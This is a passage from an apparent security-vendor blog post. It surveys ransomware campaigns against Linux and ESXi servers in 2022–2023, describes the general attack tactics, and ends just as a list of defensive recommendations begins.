Attacks on virtualization systems and Linux servers

Linux and ESXi-based systems are increasingly falling victim to ransomware attacks. So how can you protect your servers?

What methods are used to attack servers, and how to guard against ransomware

Ransomware. Nasty. But how to build defenses against it? Rather – what should be protected first and foremost? Often, Windows workstations, Active Directory servers, and other Microsoft products are the prime candidates. And this approach is usually justified. But we should bear in mind that cybercriminal tactics are constantly evolving, and malicious tools are now being developed for Linux servers and virtualization systems. In 2022, the total number of attacks on Linux systems increased by about 75%.

The motivation behind such attacks is clear: the popularity of open source and virtualization is growing, which means there are more and more servers running Linux or VMWare ESXi. These often store a lot of critical information which, if encrypted, can instantly cripple a company’s operations. And since the security of Windows systems has traditionally been the focus of attention, non-Windows servers are proving to be sitting ducks.

Attacks in 2022–2023

  • In February 2023, many owners of VMware ESXi servers were hit by the ESXiArgs ransomware Exploiting the CVE-2021-21974 vulnerability, attackers disabled virtual machines and encrypted .vmxf, .vmx, .vmdk, .vmsd and .nvram files.
  • The infamous Clop gang — noted for a large-scale attack on vulnerable Fortra GoAnywhere file-transfer services through CVE-2023-0669 — was spotted in December 2022 using (albeit in a limited way) a Linux version of its ransomware. It differs significantly from its Windows counterpart (lacking some optimizations and defensive tricks), but is adapted to Linux permissions and user types and specifically targets Oracle database folders.
  • A new version of the BlackBasta ransomware is designed specially for attacks on ESXi hypervisors. The encryption scheme uses the ChaCha20 algorithm in multi-threaded mode involving multiple processors. Since ESXi farms are typically multiprocessor, this algorithm minimizes the time taken to encrypt the entire environment.
  • Shortly before its breakup, the Conti group of hackers also armed itself with ESXi-targeting ransomware. Unfortunately, given that much of Conti’s code was leaked, their developments are now available to a broad range of cybercriminals.
  • The BlackCat ransomware, written in Rust, is also capable of disabling and deleting ESXi virtual machines. In other respects, the malicious code differs little from the Windows version.
  • The Luna ransomware, which we detected in 2022, was cross-platform to begin with, able to run on Windows, Linux and ESXi systems. And, of course, the LockBit group could hardly fail to ignore the trend: it too began to offer ESXi versions of their malware to affiliates.
  • As for older (but, alas, effective) attacks, there were also the RansomEXX and QNAPCrypt campaigns, which hit Linux servers big-time.

Server-attack tactics

Penetrating Linux servers is usually based on exploitation of vulnerabilities. Attackers can weaponize vulnerabilities in the operating system, web servers and other basic applications, as well as in business applications, databases, and virtualization systems. As demonstrated last year by Log4Shell, vulnerabilities in open-source components require special attention. After an initial breach, many ransomware strains use additional tricks or vulnerabilities to elevate privileges and encrypt the system.

Priority safeguards for Linux servers

To minimize the chances of attacks affecting Linux servers, we recommend: